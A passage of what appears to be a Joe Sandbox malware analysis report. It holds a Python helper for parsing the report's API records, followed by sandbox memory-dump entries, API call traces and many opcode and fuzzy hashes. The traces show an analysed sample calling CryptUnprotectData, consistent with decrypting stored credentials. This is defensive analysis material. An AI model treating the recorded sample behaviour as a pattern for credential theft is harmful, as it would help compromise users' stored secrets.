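        elif section == "APIs":
            m = CALL_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                current["calls"].append(ApiCall(m["func"], m["module"], args, m["ref"], m["parent"]))
        elif section == "Strings":
            current["strings"].append(line)
        elif section == "Similarity" and line.startswith("API ID:"):
            current["api_id"] = line.split(":", 1)[1].strip()
    return records

def api_words(func):
    """'GetFileVersionInfoSizeW' -> ['File', 'Version', 'Info', 'Size']."""
    if len(func) > 1 and func[-1] in "AW" and func[-2].islower():
        func = func[:-1]  # drop the ANSI/Unicode suffix
    words = WORD_RE.findall(func)
    if len(words) > 1 and words[0] in DROPPED_VERBS:
        words = words[1:]
    return words

def api_id(record):
    """Recompute the Similarity 'API ID' from the record's calls, subcalls included."""
    counts = Counter(w for call in record["calls"] for w in api_words(call.func))
    tiers = sorted(set(counts.values()), reverse=True)
    return "$".join("".join(sorted(w for w, n in counts.items() if n == t)) for t in tiers)

def verify(records):
    """True where the recomputed API ID equals the one printed in the report."""
    return [api_id(r) == r["api_id"] for r in records]

def imports_by_module(records):
    """Module -> sorted distinct APIs called, for a quick triage summary."""
    out = {}
    for c in (c for r in records for c in r["calls"]):
        out.setdefault(c.module, set()).add(c.func)
    return {m: sorted(f) for m, f in sorted(out.items())}

# Three records copied from this report, trimmed to the lines the parser reads.
SAMPLE = r"""
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
• GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
• VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
Similarity
• API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
APIs
• FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,004037F6,75573420,00403621,?), ref: 00403839
• GlobalFree.KERNEL32(?), ref: 00403840
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
Similarity
• API ID: Free$GlobalLibrary
APIs
  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
• GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
• GlobalFree.KERNEL32(00000000), ref: 100011C7
• GlobalFree.KERNEL32(00000000), ref: 100011D9
• GlobalFree.KERNEL32(?), ref: 10001203
Similarity
• API ID: Global$Free$Alloclstrcpy
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec, ok in zip(recs, verify(recs)):
        print(rec["api_id"], "recomputed as", api_id(rec), "match:", ok)
    print(imports_by_module(recs))
```

Run against a full report export, parse_records() gives one entry per routine; api_id() and verify() show whether the inferred normalisation still holds for that report's APIs, and imports_by_module() gives the distinct imports per DLL, which is the first thing to compare between the 0x00400000 image and the 0x10000000 plug-in module seen in these records.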
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                                  • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                                                  • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                                                  • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                                  • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                                  • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9

Execution Graph

Execution Coverage: 9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 8.5%
Total number of Nodes: 130
Total number of Limit Nodes: 14

[Execution graph: rendered figure of 130 nodes; the node and edge listing is omitted here. Windows APIs reached from graph nodes: CreateWindowExW, DuplicateHandle, OleInitialize, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CryptUnprotectData, WaitMessage, CallWindowProcW.]
Strings
Memory Dump Source
• Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_32d40000_________.jbxd
Similarity
• API ID:
• String ID: N
• API String ID: 0-1130791706
• Opcode ID: 7ed7b94c1bafb647bf690da9421d7a1b675f7aed10575e9faa0125bb4eddf864
• Instruction ID: 8f835830c2f502045fe5e70386569dae55f8f7b21c119a54d453f21542693c3d
• Opcode Fuzzy Hash: 7ed7b94c1bafb647bf690da9421d7a1b675f7aed10575e9faa0125bb4eddf864
• Instruction Fuzzy Hash: A173E631D1075A8EDB11EF68C944A99FBB1FF99304F51C69AE44877221EB70AAC4CF81
APIs
• CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 35E98F5D
Memory Dump Source
• Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35e90000_________.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
• Opcode ID: dd7f5f2b2bfa8945c55ee955463289a476115edeb09a80188dc3430e4db895ff
• Instruction ID: f43299309fa60ffbd4629ad8c0c6184e1ae231fc488a3bd1fd9bfded22f32b4b
• Opcode Fuzzy Hash: dd7f5f2b2bfa8945c55ee955463289a476115edeb09a80188dc3430e4db895ff
• Instruction Fuzzy Hash: CD11567680434DEFDB10CF9AD800BDEBBF5EB48320F14845AE918A7211C379A950CFA5
APIs
• CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 35E98F5D
Memory Dump Source
• Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35e90000_________.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
• Opcode ID: 2dd3aff2a7e4b3d3c270c6d467575f36af795e96f1a8b6a8c8fd3f1ff461932e
• Instruction ID: 05fa7e6bb0139fd71013acd77d0cd5aa4b3ab61313769ce605889dc37f9baa8c
• Opcode Fuzzy Hash: 2dd3aff2a7e4b3d3c270c6d467575f36af795e96f1a8b6a8c8fd3f1ff461932e
• Instruction Fuzzy Hash: 771164B6800249EFDB10CF9AD800BDEBFF5EF48320F14841AE968A7211C339A550CFA5
Strings
Memory Dump Source
• Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f00000_________.jbxd
Similarity
• API ID:
• String ID: <B2
• API String ID: 0-971703402
• Opcode ID: 8b799b84cc388af1e8012dfe9c3fab14ac171f32123d707b0994905fc22dac48
• Instruction ID: 6df6fec29f2a48f37b7a467e2c56cc06d32c5477015e52f6a3718d4d6185d233
• Opcode Fuzzy Hash: 8b799b84cc388af1e8012dfe9c3fab14ac171f32123d707b0994905fc22dac48
• Instruction Fuzzy Hash: 47E1ADB4E01218CFEB64DFA9C940B9DBBB2BF89304F2081A9E419B7351DB755A81CF54
Strings
Memory Dump Source
• Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35e90000_________.jbxd
Similarity
• API ID:
• String ID: <B2
• API String ID: 0-971703402
• Opcode ID: c4b137b98ab38ce8828f915958fffa711df398554dfcb03bafbcd12d21bb0ef5
• Instruction ID: 26e19c76f5369c64d275bc463fdb2c1645d27a50a219f612e253db9709e3475c
• Opcode Fuzzy Hash: c4b137b98ab38ce8828f915958fffa711df398554dfcb03bafbcd12d21bb0ef5
• Instruction Fuzzy Hash: 8CD1A074E01218CFEB54DFA9D990B9DBBB2BF89300F1081A9D809AB365DB355D81CF50
Strings
Memory Dump Source
• Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f00000_________.jbxd
Similarity
• API ID:
• String ID: <B2
• API String ID: 0-971703402
• Opcode ID: db8dae9e2faaf0797c82493c6c6f4ebc12faa576cc2ca0ed46c8c976d1f13ba3
• Instruction ID: 78057196d6008aa92811d4cf82ee5ef7853ad9dbe5f29c67f26ff0a479a9ec36
• Opcode Fuzzy Hash: db8dae9e2faaf0797c82493c6c6f4ebc12faa576cc2ca0ed46c8c976d1f13ba3
• Instruction Fuzzy Hash: ABD1AF74E01218CFEB55DFA9C990B9DBBB2BF89300F1080A9D409AB365DB355D81CF51
Strings
Memory Dump Source
• Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f00000_________.jbxd
Similarity
• API ID:
• String ID: 5
• API String ID: 0-2226203566
• Opcode ID: 82da7a1af4c76d2bef292026eb2968aa035b10f562e7e9773f9e365f069414f1
• Instruction ID: b6be48a0d01b3d0ff53a22963a1bb848b088d6d0070242a6771b8633e4c22e40
• Opcode Fuzzy Hash: 82da7a1af4c76d2bef292026eb2968aa035b10f562e7e9773f9e365f069414f1
• Instruction Fuzzy Hash: 1D410675E00248CBEB08CFAAD950A9EBBF2BF89304F14C52AC418BB355DB355946CF50
Memory Dump Source
• Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a357a8c3b9967b3effd1bc8453095b5003dba31ad927a764d7e59ccff91539be
• Instruction ID: dd80daeb6025b309e7f91a959f38348a3d6b395afb59cc967b47cd7a643c909e
• Opcode Fuzzy Hash: a357a8c3b9967b3effd1bc8453095b5003dba31ad927a764d7e59ccff91539be
• Instruction Fuzzy Hash: 65727270604205DFCB15CF68C594AAEBBF2FF48311F158559E8269F2A2D730ED89CB51
Memory Dump Source
• Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_35f20000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 62e48692efc498deab0d28095007c8b3e980204734d8fd5be04f0a1c8a701c40
• Instruction ID: f99d030f179a78ed9f24afdfd46fe4a9c2346ccd84bea0a0df5deadc67a63306
• Opcode Fuzzy Hash: 62e48692efc498deab0d28095007c8b3e980204734d8fd5be04f0a1c8a701c40
• Instruction Fuzzy Hash: EC824A74E012288FDB64DF69C994BDEBBB2BF89300F1081E9981DA7261DB305E85CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 765675cbe2655872ecb8b0bad1f378526d7a91931bcd9c32455172c291589466
                                                                                                                                                  • Instruction ID: 7645b4c65050555c0d060f669f07f66b77210b53b1eb254048c6ec100b6ec371
                                                                                                                                                  • Opcode Fuzzy Hash: 765675cbe2655872ecb8b0bad1f378526d7a91931bcd9c32455172c291589466
                                                                                                                                                  • Instruction Fuzzy Hash: 97326C6680D7D48FCB678B7448E825B7FB16B92105BC945DFC4C78B687EB28C609C362
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978493281.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f20000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 47c2848676fcde5b71091c85cdd19ba59b91398b627f77688d068d7ba829ff8d
                                                                                                                                                  • Instruction ID: bdbb74f79431e00f408599f2930362448a52f7f3425cd5b0e93947909b8b2e26
                                                                                                                                                  • Opcode Fuzzy Hash: 47c2848676fcde5b71091c85cdd19ba59b91398b627f77688d068d7ba829ff8d
                                                                                                                                                  • Instruction Fuzzy Hash: AA726D74E012288FEB65DF69C994BDEBBB2BF89300F1081E9944DA7261DB305E85CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a8d6e4412166a4fe100161f72ad25ed1df3af9700ac65dbff172a1350cb422c5
                                                                                                                                                  • Instruction ID: 9f20d8ad8740e2b1f08dd4fce35c62b1be07e420ec62d4304a4edd9704b9988c
                                                                                                                                                  • Opcode Fuzzy Hash: a8d6e4412166a4fe100161f72ad25ed1df3af9700ac65dbff172a1350cb422c5
                                                                                                                                                  • Instruction Fuzzy Hash: 24221674E042588FDB14DFA9C884BDEBBB2BF88304F5081A9D849AB355DF359985CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: abc30e61a5f685f5b9045660eb6d00927fd8ed0bfa936f79acfaea699f7a2a84
                                                                                                                                                  • Instruction ID: c3ae88791a01463d6c389058f234a6c84d25c2eff3e58f3976f9ada7c7377f45
                                                                                                                                                  • Opcode Fuzzy Hash: abc30e61a5f685f5b9045660eb6d00927fd8ed0bfa936f79acfaea699f7a2a84
                                                                                                                                                  • Instruction Fuzzy Hash: 12129170A04219CFDB14DF69D855BAEBBF6BF88301F108169E819EB391DB309D85CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ac33099949ec71de1c0c56a83cec5cf6010afaab2db91f074d7fbbce13aa84e9
                                                                                                                                                  • Instruction ID: a11bf4f22c97a3efc9f7cf513be237caed18283bbfdf2497b9ea471724f1bcd4
                                                                                                                                                  • Opcode Fuzzy Hash: ac33099949ec71de1c0c56a83cec5cf6010afaab2db91f074d7fbbce13aa84e9
                                                                                                                                                  • Instruction Fuzzy Hash: F0E1EB75A00318CFDB14DFA9C884A9DBBF2BF89315F158069E859AB361DB30AD45CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3952693567.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: be74424d5327c03b12b6d7db9865d26749dcf35029927545d452d7d0051bb4e6
                                                                                                                                                  • Instruction ID: a4496d96470543870a2d22a267e0699a6954d0de9396f1a3678ef9a48d0c4020
                                                                                                                                                  • Opcode Fuzzy Hash: be74424d5327c03b12b6d7db9865d26749dcf35029927545d452d7d0051bb4e6
                                                                                                                                                  • Instruction Fuzzy Hash: 24D12C34A00619DFCB54CFA9D884AADBBF2BF88742F158055E865FB2A1DB30DD49CB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35e90000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4ec89b207873e55dbc7c39ae6d398ac3f3a60f5ccb5dc95817b014e44e4832e9
                                                                                                                                                  • Instruction ID: 466a3f2c2586356e4660aba95ad1f4cccd6fc9566c23c4e9ca662ea05eddd257
                                                                                                                                                  • Opcode Fuzzy Hash: 4ec89b207873e55dbc7c39ae6d398ac3f3a60f5ccb5dc95817b014e44e4832e9
                                                                                                                                                  • Instruction Fuzzy Hash: 21E1AF74E01218CFEB14DFA5C844BDDBBB2BF89304F2081A9D419AB3A1DB755A85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978513933.0000000035F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f30000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9cc222875ac3d309446b0ccc2b8533cc0650cbdcd8e3f92c3086a8e801c1a00e
                                                                                                                                                  • Instruction ID: 16197a49e680e057968a7e3e476b4a607ef700b10b5207ba668f5c9f372f16a0
                                                                                                                                                  • Opcode Fuzzy Hash: 9cc222875ac3d309446b0ccc2b8533cc0650cbdcd8e3f92c3086a8e801c1a00e
                                                                                                                                                  • Instruction Fuzzy Hash: D1D17D74E01218CFEB54DFA5C994B9DBBB2FB89300F5081A9D419AB364DB355E81CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978441628.0000000035F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F00000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35f00000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9df5485841d44dbba35f04a2dd2bc1ec7f09e9f4da652a00aa40a2e2f61f7b61
                                                                                                                                                  • Instruction ID: 34808e8f75e7596c36a8f01f26b08b520a21f1fcf2f855ec6104e6706447bc33
                                                                                                                                                  • Opcode Fuzzy Hash: 9df5485841d44dbba35f04a2dd2bc1ec7f09e9f4da652a00aa40a2e2f61f7b61
                                                                                                                                                  • Instruction Fuzzy Hash: 78D17B74E012188FDB54DFA9C994B9DBBB2FB89300F6081A9D419AB364DB359E81CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978381801.0000000035E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_35e90000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a1a74c0975bff6cbdd6c672070aabe97cad3a259eb260660de4275dde795d0e6
                                                                                                                                                  • Instruction ID: 92c82f8081f2e6a789eeac599ed66c9c3bdc692391557efeeceeefc2b4b6fb7e
                                                                                                                                                  • Opcode Fuzzy Hash: a1a74c0975bff6cbdd6c672070aabe97cad3a259eb260660de4275dde795d0e6
                                                                                                                                                  • Instruction Fuzzy Hash: 69C1A074E01218CFEB14DFA9C954B9DBBB2BF89301F6081A9D809AB365DB355E81CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cac8bf216d27b7bc1b86cf01e2c488f4a4fc3bfea1e08b87093ae84caeecbea9
                                                                                                                                                  • Instruction ID: 1eb1ff0cf91a79cb951f050c2947e3862fc369c9ef89d66feadc2d70a09a08fe
                                                                                                                                                  • Opcode Fuzzy Hash: cac8bf216d27b7bc1b86cf01e2c488f4a4fc3bfea1e08b87093ae84caeecbea9
                                                                                                                                                  • Instruction Fuzzy Hash: 8AC1A174E01218CFDB14DFA5C994B9DBBB2BF89300F6081A9D809AB365DB359E85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fb90d05e6b97126d0c6832a37db23df46430ed7290cd1a0bffbf63f3611a622e
                                                                                                                                                  • Instruction ID: 9d2f5acd58a966ae95c1e007b88ad6e97515af07a46b4d1afc51506f93c10ea8
                                                                                                                                                  • Opcode Fuzzy Hash: fb90d05e6b97126d0c6832a37db23df46430ed7290cd1a0bffbf63f3611a622e
                                                                                                                                                  • Instruction Fuzzy Hash: DEC1A074E01218CFEB14DFA5C954B9DBBB2BF89300F6081A9E819AB365DB355E81CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 00166949ac3009f19fc95f4213da83806f6a6ffa006c50797038eccfbf2f0284
                                                                                                                                                  • Instruction ID: 3d1d0551d9d37f42ce6392edaf00c6385197007bffd6bfc88f3103d27c8069f5
                                                                                                                                                  • Opcode Fuzzy Hash: 00166949ac3009f19fc95f4213da83806f6a6ffa006c50797038eccfbf2f0284
                                                                                                                                                  • Instruction Fuzzy Hash: 5E917975D14619CFEB04AFA0C8597EEBBB1FB5A302F90542AD012772E0CB794A49CF64
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3978620236.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_360b0000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: aa940e93c415bd95f3d798da190293049fdc5c8e18a4e743b6aea13684abadc3
                                                                                                                                                  • Instruction ID: aff55dc769d7aa7111f58bef6af5fdc450ee934e2e73cec620f173812e137e93
                                                                                                                                                  • Opcode Fuzzy Hash: aa940e93c415bd95f3d798da190293049fdc5c8e18a4e743b6aea13684abadc3
                                                                                                                                                  • Instruction Fuzzy Hash: E0916875D10619CFEB04AFA0C8597AEBBB1FB5A302F90542AD112772E0CB794A49CF64
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 787535fae0569fe259fba68353cb074a7ed1bb11dafa2dc7b9b9f4dd267b3420
                                                                                                                                                  • Instruction ID: 3c9a25ea5503b7316b0c7edfa542b86492d93982fa8f26b917ccc3163b7a223e
                                                                                                                                                  • Opcode Fuzzy Hash: 787535fae0569fe259fba68353cb074a7ed1bb11dafa2dc7b9b9f4dd267b3420
                                                                                                                                                  • Instruction Fuzzy Hash: 8CA191B5E01228CFEB68CF6AC944B9DBBF2AF89300F14C1A9D448A7254DB745A85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 41b20ad7b538987425ec33317acc995eac7d93aa2c9e5ceee8f3f4a6ff45a863
                                                                                                                                                  • Instruction ID: 953968b1518a25f6194b3711c4fef345704b3e25a75afee3864f4b156d5957c6
                                                                                                                                                  • Opcode Fuzzy Hash: 41b20ad7b538987425ec33317acc995eac7d93aa2c9e5ceee8f3f4a6ff45a863
                                                                                                                                                  • Instruction Fuzzy Hash: 96A1E170D00208CFEB14DFA9C988B9DBBB1BF89315F208269E418B73A1DB759985CF55
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_32d40000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a2b276a8c48c57be94a8cb46dbd03df560486fccd1e59321e3e25e20c7be4a1f
                                                                                                                                                  • Instruction ID: 953947f40d555e9525e5c0b117966c3b5ed7d59087cd3587b37774073cf2cd3e
                                                                                                                                                  • Opcode Fuzzy Hash: a2b276a8c48c57be94a8cb46dbd03df560486fccd1e59321e3e25e20c7be4a1f
                                                                                                                                                  • Instruction Fuzzy Hash: ADA1F570D002088FEB14DFA9C988BDDBBB1BF89315F208269E409A73A5DB755985CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.3975729252.0000000032D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 32D40000, based on PE: false
